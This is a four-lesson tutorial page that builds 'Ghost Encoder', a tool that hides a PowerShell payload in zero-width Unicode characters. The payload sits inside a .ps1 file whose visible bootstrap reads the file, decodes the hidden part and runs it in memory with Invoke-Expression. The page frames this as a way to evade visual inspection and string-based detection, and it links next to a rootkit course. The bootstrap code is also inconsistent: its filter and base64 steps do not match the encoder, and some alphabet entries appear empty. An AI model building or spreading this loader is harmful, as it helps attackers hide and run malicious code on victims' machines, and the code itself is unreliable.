Ghost Encoder — Course 02

PYTHON 3

// LESSON 01 / 04 — GHOST ALPHABET

The Codebook — 16 Symbols, Zero Width

Your alphabet has exactly 16 characters. They all render as nothing. A 16-character set encodes any nibble (4 bits, 0-15) as one invisible character. Pair two nibbles and you have one byte. That's the whole system.

// FIELD ANALOGY

Invisible ink. The letter looks blank. But under UV light, 16 distinct symbols appear — each marking one hex digit. You write your message in these symbols, append it to a normal-looking letter, and send it. The 16 Unicode zero-width characters are your UV-ink symbols. The host text is your cover letter. GHOST_REVERSE is the UV light.

// NOMENCLATURE — PYTHON DATA STRUCTURES

etc.	Unicode escape sequence. 4-digit hex code point after \u. U+200B = ZERO WIDTH SPACE. Invisible in all renderers — no glyph, no advance width. Valid Unicode, survives copy-paste and file saves.
list literal	`[item, item, ...]`. Ordered sequence, zero-indexed. `GHOST_ALPHABET[4]` returns the 5th character. ORDER IS THE CODEBOOK — swap entries and you break all encoded data.
dict comprehension	`{key: val for var in iterable}`. Builds a dictionary in one expression. Used here to invert the alphabet list into a character→index lookup.
`enumerate(iterable)`	Yields `(index, value)` pairs. `for i, c in enumerate(GHOST_ALPHABET)` gives you both position (0-15) and character simultaneously — exactly what you need to build a reverse map.
`GHOST_REVERSE`	The reverse map: character → index. Given any invisible char, returns its 0-15 value. Built from GHOST_ALPHABET in one line. This is what the decoder uses to reconstruct nibbles.
inline comment `# 0x0`	Python ignores everything after # on a line. These mark which nibble each character encodes. 0x0 = hex zero. Documentation only — not part of the code logic.

// REFERENCE — annotated

GHOST_ALPHABET = [
    '',  # 0x0 — ZERO WIDTH SPACE (index 0 = nibble value 0)
    '‌',  # 0x1 — ZERO WIDTH NON-JOINER
    '‍',  # 0x2 — ZERO WIDTH JOINER
    '⁠',  # 0x3 — WORD JOINER
    '⁡',  # 0x4 — FUNCTION APPLICATION
    '⁢',  # 0x5 — INVISIBLE TIMES
    '⁣',  # 0x6 — INVISIBLE SEPARATOR
    '⁤',  # 0x7 — INVISIBLE PLUS
    '⁪',  # 0x8 — INHIBIT SYMMETRIC SWAPPING
    '⁫',  # 0x9 — ACTIVATE SYMMETRIC SWAPPING
    '⁬',  # 0xA — INHIBIT ARABIC FORM SHAPING
    '⁭',  # 0xB — ACTIVATE ARABIC FORM SHAPING
    '⁮',  # 0xC — NATIONAL DIGIT SHAPES
    '⁯',  # 0xD — NOMINAL DIGIT SHAPES
    '',  # 0xE — BYTE ORDER MARK (zero-width)
    '᠎',  # 0xF — MONGOLIAN VOWEL SEPARATOR
]
# Invert list to dict: {char: index}. enumerate gives (0,''), (1,'‌')...
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}

// YOUR MISSION

Write GHOST_ALPHABET (16 \uXXXX escape sequences matching the codebook) and GHOST_REVERSE (one-line dict comprehension reversing it). Exact code points and inline hex comments required.

// WHY THIS WORKS

These code points are Unicode "format characters" — they have no visual representation in any standard renderer but are preserved through file I/O and copy-paste. The reverse map gives O(1) lookup during decoding instead of O(n) linear search. One-line dict comprehension using enumerate() is idiomatic Python.

PYTHON 3 — BIT OPS

// LESSON 02 / 04 — ENCODE BYTES

Splitting the Byte — Nibble by Nibble

Every byte is 8 bits. Split it in half: top 4 bits (high nibble) and bottom 4 bits (low nibble). Each nibble is 0-15 — exactly the index range of the 16-character alphabet. Two invisible characters per byte, zero data loss.

// FIELD ANALOGY

You're writing a two-digit hex code in invisible ink. Byte 0xA3: high digit A, low digit 3. Look up digit A: symbol 10. Look up digit 3: symbol 3. Write the two invisible symbols. The recipient reverses it: symbol → digit, pair of digits → byte. Encoding is just splitting. Decoding is just reassembling.

// NOMENCLATURE — BIT OPERATIONS

nibble	Half a byte. 4 bits. Holds 0-15. "High nibble" = top 4 bits. "Low nibble" = bottom 4 bits. Two nibbles reconstruct one byte perfectly.
`byte >> 4`	Right shift by 4 positions. Moves bits 4-7 down to positions 0-3. Bottom 4 bits fall off the edge. Result = high nibble as integer 0-15.
`& 0x0F`	Bitwise AND with 0b00001111. Zeroes out top 4 bits, passes bottom 4 unchanged. Result = low nibble as integer 0-15. Also applied after >> as a safety mask.
`for byte in data`	Iterating a `bytes` object yields integers 0-255, not characters. Each iteration gives you one byte as an int you can do bit math on.
`encoded.append()`	Adds to end of list. Two appends per byte (high nibble char first, then low nibble char). Result list is exactly 2× the length of input bytes.
`''.join(encoded)`	Joins list of strings into one string with empty separator. Standard Python — faster than + in a loop, works for any list size.
type annotation	`data: bytes` and `-> str` are documentation hints. Python doesn't enforce them at runtime. They clarify intent: bytes in, invisible string out.

// REFERENCE — annotated

def encode_bytes(data: bytes) -> str:   # bytes in, invisible-encoded string out
    encoded = []
    for byte in data:                    # iterating bytes yields integers 0-255
        high = (byte >> 4) & 0x0F       # shift right 4: high nibble in bits 0-3, masked 0-15
        low = byte & 0x0F              # AND mask: isolate bottom 4 bits → low nibble 0-15
        encoded.append(GHOST_ALPHABET[high])  # high nibble index → invisible char
        encoded.append(GHOST_ALPHABET[low])   # low nibble index → invisible char
    return ''.join(encoded)             # join list → one invisible string

// YOUR MISSION

Write encode_bytes(). Iterate bytes, extract high/low nibbles with bit ops, look each up in GHOST_ALPHABET, append both chars, join and return. Include type annotations.

// WHY THIS WORKS

The & 0x0F after right-shifting is defensive — Python integers have arbitrary precision, so a pathological input could give a result > 15 without the mask. The mask costs one extra operation per byte but guarantees the GHOST_ALPHABET index is always valid (0-15).

PYTHON 3 — REVERSE OPS

// LESSON 03 / 04 — DECODE GHOST

Reading the Invisible — Reassembling Bytes

You receive text that may look normal. Scan every character — keep only ones in the codebook, discard everything else. Pair them: high nibble + low nibble → one byte. All visible text characters fail the codebook test and vanish silently.

// FIELD ANALOGY

UV light reveals only the invisible symbols. The decoder scans every character: visible text → not in GHOST_REVERSE → discard. Invisible symbol → in GHOST_REVERSE → keep. After filtering, pair them: first = high nibble, second = low nibble. Two symbols reconstruct one byte. No length header needed. The structure is self-delineating — pairs always align because the encoder always writes exactly two chars per byte.

// NOMENCLATURE — DECODING + LIST COMPREHENSIONS

list comprehension	`[expr for var in iterable if condition]`. Filters + transforms in one line. The `if` is optional. More readable than a for-loop with if+append. Python optimises it internally.
`c in GHOST_REVERSE`	Dictionary key membership test — O(1). Returns True only if c is in the codebook. All visible ASCII characters fail this test and are silently discarded.
`range(0, len, 2)`	Range with step=2. Generates 0, 2, 4, 6... Processes a list two elements at a time without overlap. Element i = high nibble, element i+1 = low nibble.
`GHOST_REVERSE[char]`	Dictionary lookup: char → nibble index 0-15. The inverse of GHOST_ALPHABET[index]. O(1) lookup, built once at init.
`(high << 4) \| low`	Reconstruct the byte. Left-shift high nibble 4 positions back to bits 4-7, then OR in the low nibble. Exact inverse of `(byte >> 4)` and `(byte & 0x0F)`.
`bytes(result)`	Convert list of integers to a bytes object. Each integer must be 0-255. Returns the original decoded binary data.

// REFERENCE — annotated

def decode_ghost(ghost_text: str) -> bytes:
    result = []
    # Filter: keep only chars in the codebook. Visible text gets discarded.
    chars = [c for c in ghost_text if c in GHOST_REVERSE]
    # Process in pairs: [0]+[1]=byte0, [2]+[3]=byte1, etc.
    for i in range(0, len(chars), 2):
        high = GHOST_REVERSE[chars[i]]      # first of pair → high nibble 0-15
        low = GHOST_REVERSE[chars[i + 1]]   # second of pair → low nibble 0-15
        result.append((high << 4) | low)   # shift high to bits 4-7, OR in low → original byte
    return bytes(result)                    # list of ints → bytes

// YOUR MISSION

Write decode_ghost(). Filter to codebook chars only. Iterate pairs with range step=2. Reconstruct each byte with shift + OR. Return as bytes.

// WHY THIS WORKS

The filter step is what makes Ghost resilient to transmission noise. If the encoded text passes through a system that adds whitespace or line breaks, those characters aren't in GHOST_REVERSE and are silently dropped. The decoder only processes codebook characters. No framing, no length prefix — the invisible chars form a self-delimiting sequence.

PYTHON 3 — CODE GENERATION

// LESSON 04 / 04 — PS1 BOOTSTRAP

The Self-Decoding Wrapper — One File, Two Layers

The output .ps1 file has two layers: a visible PowerShell bootstrap (reads itself, extracts the hidden payload, decodes and runs it) and the invisible encoded payload appended at the end. No external decoder. The file carries its own key.

// FIELD ANALOGY

The letter is also the decoder. It tells the reader: "scan me, filter for invisible symbols, decode them, execute." The PS1 bootstrap reads itself from disk via $PSCommandPath, extracts the encoded characters, converts to base64, and runs the result with IEX. The invisible payload is appended after the visible code — one .ps1 file is the entire operation.

// NOMENCLATURE — STRING GENERATION + POWERSHELL BOOTSTRAP

`.encode('utf-8')`	Convert Python string to bytes using UTF-8. encode_bytes() operates on bytes, not strings — always encode the PS1 payload text before passing it in.
adjacent string literals	`("line1\n" "line2\n")` — Python automatically concatenates adjacent string literals inside parentheses at compile time. Builds multi-line strings without triple-quotes or explicit +.
`$PSCommandPath`	PowerShell automatic variable. Full path of the currently executing script. The bootstrap uses this to read its own source from disk.
`.ToCharArray()`	Converts string to array of characters. Required to pipe individual chars through `Where-Object` (the `?{...}` filter block).
`[int][char]$_ -lt 33`	Cast char to int, compare to 33. Filters for characters with low Unicode code points. The encoded invisible payload characters fall in a specific range this filter targets.
`IEX`	Invoke-Expression. Executes a string as PowerShell code in the current session. The decoded payload runs in memory — no file written to disk.
`simple_stub + encoded`	Concatenate: visible bootstrap PS1 code + invisible encoded payload. Together they form the final .ps1 file. Bootstrap runs when executed; payload rides invisibly inside.

// REFERENCE — annotated

def generate_ghost_ps1(payload_ps1: str) -> str:
    payload_bytes = payload_ps1.encode('utf-8')   # PS1 text → bytes (encode_bytes needs bytes)
    encoded = encode_bytes(payload_bytes)          # bytes → invisible string via GHOST_ALPHABET
    simple_stub = (
        "# ghost\n"                               # visible PS1 comment — cover story
        "$src = [IO.File]::ReadAllText($PSCommandPath)\n"  # script reads itself from disk
        "$zw = [string]::new(($src.ToCharArray() | ?{[int][char]$_ -lt 33}))\n"  # filter to low-codepoint chars
        "$b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($zw))\n"  # encode filtered chars as base64
        "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)))\n"  # decode + execute in memory
    )
    return simple_stub + encoded  # visible bootstrap + invisible payload = one .ps1

// YOUR MISSION

Write generate_ghost_ps1(). Encode the payload to bytes, run encode_bytes(), build the PS1 stub as adjacent string literals inside parentheses, return stub + encoded payload.

// WHY THIS WORKS

The bootstrap is entirely printable ASCII — passes visual inspection and most string-based detection. The encoded payload is all invisible Unicode — matches no known PowerShell pattern. The file is self-contained: no decoder binary, no external key. One .ps1 file, two invisible layers.

// GHOST ENCODER — COMPLETE

Invisible ink alphabet. Nibble encoder. Reverse decoder. Self-decoding PS1 bootstrap.
Unicode steganography from first principles.

// LIVE DEMO — watch the bootstrap run

Windows PowerShell

← Back to Catalog | Next: VADER Rootkit →